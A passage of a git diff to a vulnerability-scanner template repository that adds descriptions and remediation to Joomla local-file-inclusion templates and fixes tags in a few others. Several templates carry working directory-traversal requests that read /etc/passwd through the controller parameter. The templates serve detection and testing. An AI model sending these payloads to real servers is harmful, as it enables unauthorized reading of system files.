(com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12239 - https://www.cvedetails.com/cve/CVE-2010-1952 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1952 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1953.yaml b/cves/2010/CVE-2010-1953.yaml index 106ad37fdc..0a7cbaefdb 100644 --- a/cves/2010/CVE-2010-1953.yaml +++ b/cves/2010/CVE-2010-1953.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12288 - https://www.cvedetails.com/cve/CVE-2010-1953 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1953 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml index 15235070e6..565ccf2578 100644 --- a/cves/2010/CVE-2010-1954.yaml +++ b/cves/2010/CVE-2010-1954.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1954 - info: name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12287 - https://www.cvedetails.com/cve/CVE-2010-1954 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1954 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1955.yaml b/cves/2010/CVE-2010-1955.yaml index 932f7d5fe8..ff58c6bfe4 100644 --- a/cves/2010/CVE-2010-1955.yaml +++ b/cves/2010/CVE-2010-1955.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1955 - info: name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12238 - https://www.cvedetails.com/cve/CVE-2010-1955 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1955 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml index a9e931f712..98ef4fa230 100644 --- a/cves/2010/CVE-2010-1956.yaml +++ b/cves/2010/CVE-2010-1956.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1956 - info: name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12285 - https://www.cvedetails.com/cve/CVE-2010-1956 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1956 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml index 16253fb2cf..11697a7725 100644 --- a/cves/2021/CVE-2021-22145.yaml +++ b/cves/2021/CVE-2021-22145.yaml @@ -9,7 +9,7 @@ info: - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html - tags: cve,cve2021,elascticsearch,elasticsearch + tags: cve,cve2021,elasticsearch classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.50 diff --git a/technologies/apollo-server-detect.yaml b/technologies/apollo-server-detect.yaml index 699ebca332..8c2dee07bc 100644 --- a/technologies/apollo-server-detect.yaml +++ b/technologies/apollo-server-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL). reference: https://github.com/apollographql/apollo-server - tags: apollo,tect,graphql + tags: apollo,detect,graphql requests: - method: POST @@ -33,4 +33,4 @@ requests: - type: status status: - - 400 \ No newline at end of file + - 400 diff --git a/token-spray/api-circleci.yaml b/token-spray/api-circleci.yaml index cfe7672786..b01e427381 100644 --- a/token-spray/api-circleci.yaml +++ b/token-spray/api-circleci.yaml @@ -5,7 +5,7 @@ info: author: zzeitlin reference: https://circleci.com/docs/api/v1 severity: info - tags: token-spray,circle,circleci + tags: token-spray,circleci self-contained: true requests: diff --git a/vulnerabilities/wordpress/noptin-open-redirect.yaml b/vulnerabilities/wordpress/noptin-open-redirect.yaml index a9e96b56dc..82510273ad 100644 --- a/vulnerabilities/wordpress/noptin-open-redirect.yaml +++ b/vulnerabilities/wordpress/noptin-open-redirect.yaml @@ -19,4 +19,4 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' #https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1